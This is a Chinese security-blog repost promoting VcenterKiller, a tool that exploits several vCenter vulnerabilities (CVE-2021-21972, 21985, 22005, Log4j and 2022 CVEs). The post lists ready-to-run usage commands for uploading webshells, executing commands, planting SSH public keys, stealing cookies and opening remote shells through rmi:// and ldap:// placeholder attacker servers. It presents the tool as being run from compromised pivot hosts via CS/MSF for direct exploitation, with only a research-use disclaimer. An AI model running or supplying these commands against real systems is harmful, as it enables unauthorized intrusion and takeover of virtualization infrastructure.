一款针对Vcenter的综合利用工具
2022-10-27 08:32:28 Author: 天驿安全(查看原文) 阅读量:16 收藏

声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。

工具介绍

一款针对Vcenter的综合利用工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005,提供一键上传webshell,命令执行或者上传公钥并使用SSH连接的功能,以及针对Apache Log4j CVE-2021-44228漏洞在Vcenter上的检测以及利用,比如命令执行并获取回显(需要一个ldap恶意服务器),现在不需要另外启动ldap服务器了,我根据jndi-injection工具手搓了一个利用方式,Vcenter使用的中间件是Tomcat,直接使用TomcatBypass的利用链就行了。

应用场景

一般Vcenter都放在内网,并且漏洞特征也都是烂大街,像什么fscan啦一扫就出来了,那么VcenterKiller就不是用来检测目标是否存在漏洞的,而是直接尝试利用,一般通过CS/MSF在跳板上来执行,所以去掉了其余花里胡哨的输出

使用方法

go build -o main.exe
./main.exe -u https://192.168.1.1 -m 21985 -c whoami./main.exe -u https://192.168.1.1 -m 22005 -f test.jsp./main.exe -u https://192.168.1.1 -m 21972 -f test.jsp./main.exe -u https://192.168.1.1 -m 21972 -f id_rsa.pub -t ssh //传公钥./main.exe -u https://192.168.1.1 -m 21985 -t rshell -r rmi://xx.xx.xx.xx:1099/xx./main.exe -u https://192.168.1.1 -m log4center -t scan // scan log4j./main.exe -u https://192.168.1.1 -m log4center -t exec -r ldap://xx.xx.xx.xx:1389 -c whoami //也可以不指定ldap服务./main.exe -u https://xx.xx.com -m 22954 whoami./main.exe -u https://xx.xx.com -m 22972 //get cookie./main.exe -u https://xx.xx.com -m 31656 //If CVE-2022-22972不能用就换CVE-2022-31656

下载地址

https://github.com/Schira4396/VcenterKiller/

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNjIxNDQyMQ==&mid=2247493123&idx=1&sn=c4d0f36d7360121818f909db8d3d0103&chksm=c151e1f9f62668ef0a88b276af9f5bb707784d3e43d764b6c772401d2650320aef6282daf251#rd
如有侵权请联系:admin#unsafe.sh